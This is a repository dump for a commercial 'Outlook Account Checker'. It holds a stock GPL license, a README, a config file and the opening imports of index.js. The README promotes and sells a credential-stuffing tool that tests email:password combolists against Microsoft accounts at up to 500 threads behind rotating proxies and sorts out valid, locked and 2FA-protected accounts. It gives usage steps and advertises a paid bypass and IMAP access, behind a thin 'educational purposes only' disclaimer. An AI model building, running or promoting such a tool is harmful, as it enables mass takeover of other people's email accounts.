├── LICENSE ├── README.md ├── config.js ├── index.js ├── input ├── combolist.txt └── proxies.txt ├── modules ├── accesstoken.js ├── imap.js ├── logger.js ├── login.js └── thunderbird.js ├── output └── valid.txt ├── package-lock.json ├── package.json └── utils ├── headers.js └── separator.js /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 4 | 5 |
6 | 7 | # Outlook Account Checker 8 |
9 | 10 |
11 | 12 | 13 | ![showcase](https://github.com/user-attachments/assets/d68cbed8-112d-48fc-b766-9256468a9595) 14 | 15 | 16 |

17 | 18 | [![FREE VERSION](https://img.shields.io/badge/FREE%20VERSION-%23FF0000.svg?style=for-the-badge&logo=YouTube&logoColor=white)](https://youtube.com) 19 | [![PAID VERSION](https://img.shields.io/badge/PAID%20VERSION-%23FF0000.svg?style=for-the-badge&logo=YouTube&logoColor=white)](https://youtube.com) 20 |
21 |   [![Discord](https://img.shields.io/badge/Discord-%235865F2.svg?style=for-the-badge&logo=discord&logoColor=white)](https://discord.gg/sm38JmvVey) 22 | [![Telegram](https://img.shields.io/badge/Telegram-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/etherialdev) 23 |
24 | [![Channel](https://img.shields.io/badge/Channel-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/etherialhub) 25 |

26 | 27 | 28 | 29 |
30 | 31 | ## 🔓 Free Version 32 | 🔥 **Features:** 33 | - **Request-based processing** 34 | - Supports up to **500 threads** for high-speed operations 35 | - **Efficient** proxy usage, supporting HTTP, SOCKS4, and SOCKS5 proxies 36 | - **Accurate detection** of locked, 2FA-protected, invalid, and valid accounts (**99.9% detection rate**) 37 | 38 | ## 🔒 Paid Version 39 | 💰 **Pricing:** 40 | - **Lifetime license key:** $99 41 | - **Full source code:** $250 42 | - **Free** release at **200** stars 43 | 44 | 🔥 **Features:** 45 | - **Recordnotice** bypass 46 | - **Includes all free version features** 47 | - **IMAP enabler** using the **Thunderbird Mobile API** 48 | - **Inbox filter** with custom domain input in the config file 49 | 50 | ## 📑 File Structure 51 | 52 | ``` 53 | 📁 input/ 54 | ├── 📄 combolist.txt # Microsoft Outlook accounts, email:password format 55 | └── 📄 proxies.txt # Proxies, username:password@hostname:port or ip:port format 56 | 57 | 📁 output/ 58 | ├── 📄 valid.txt # Valid outlook accounts 59 | ├── 📄 hits.txt # Inbox filtered accounts (Paid version) 60 | ├── 📄 locked.txt # Accounts, that are locked (recovery and other scenarios) 61 | ├── 📄 phone_locked.txt # Phone locked accounts 62 | ├── 📄 2fa.txt # 2fa protected accounts 63 | ├── 📄 invalid.txt # Invalid accounts 64 | └── 📄 failed_check.txt # Failed to check these accounts 65 | ``` 66 | ## ⚙️ Configuration 67 | ```js 68 | module.exports = { 69 | threads: 100, // Thread count 70 | retry_limit: 1, // Number of retries if check fails 71 | proxy_type: "HTTP", // Proxy type: HTTP | SOCKS4 | SOCKS5 72 | inbox_filter: ["example.com", "", ""] // Domain input, for the inbox filter 73 | }; 74 | 75 | ``` 76 | 77 | ## 💻 Usage (Source Code) 78 | - **Install nodejs: [[click]](https://nodejs.org/en/download/prebuilt-installer)** 79 | - **Install all dependencies: npm install** 80 | - **Put your proxies in input/proxies.txt | username:password@hostname:port or ip:port format** 81 | - **Put your accounts in input/combolist.txt | email:password** 82 | - **Start the program with: node index.js** 83 | 84 | ## ❗ Legal & Contact: 85 | 86 | - **For support contact: [Telegram](https://t.me/etherialdev)** 87 | 88 | - **This tool is for educational purposes only. By using it, you acknowledge that I am not liable for any consequences resulting from its use.** 89 | 90 | -------------------------------------------------------------------------------- /config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | threads: 100, 3 | retry_limit: 1, 4 | proxy_type: "SOCKS5", // HTTP | SOCKS4 | SOCKS5 5 | inbox_filter: ["", "", ""] // Paid option, contact: https://t.me/etherialdev 6 | }; -------------------------------------------------------------------------------- /index.js: -------------------------------------------------------------------------------- 1 | const { login_func } = require('./modules/login.js'); 2 | const { thunderbird_func } = require('./modules/thunderbird.js'); // Purchase the full version: https://t.me/etherialdev 3 | const { accesstoken_func } = require('./modules/accesstoken.js'); // Purchase the full version: https://t.me/etherialdev 4 | const { imap_func } = require('./modules/imap.js'); // Purchase the full version: https://t.me/etherialdev 5 | const { CookieJar } = require('tough-cookie'); 6 | const { get_sections } = require('./utils/separator.js'); 7 | const fs = require('fs'); 8 | const { Log } = require('./modules/logger.js'); 9 | const path = require('path'); 10 | 11 | const got = require('got'); 12 | const { SocksProxyAgent } = require('socks-proxy-agent'); 13 | const { HttpsProxyAgent } = require('https-proxy-agent'); 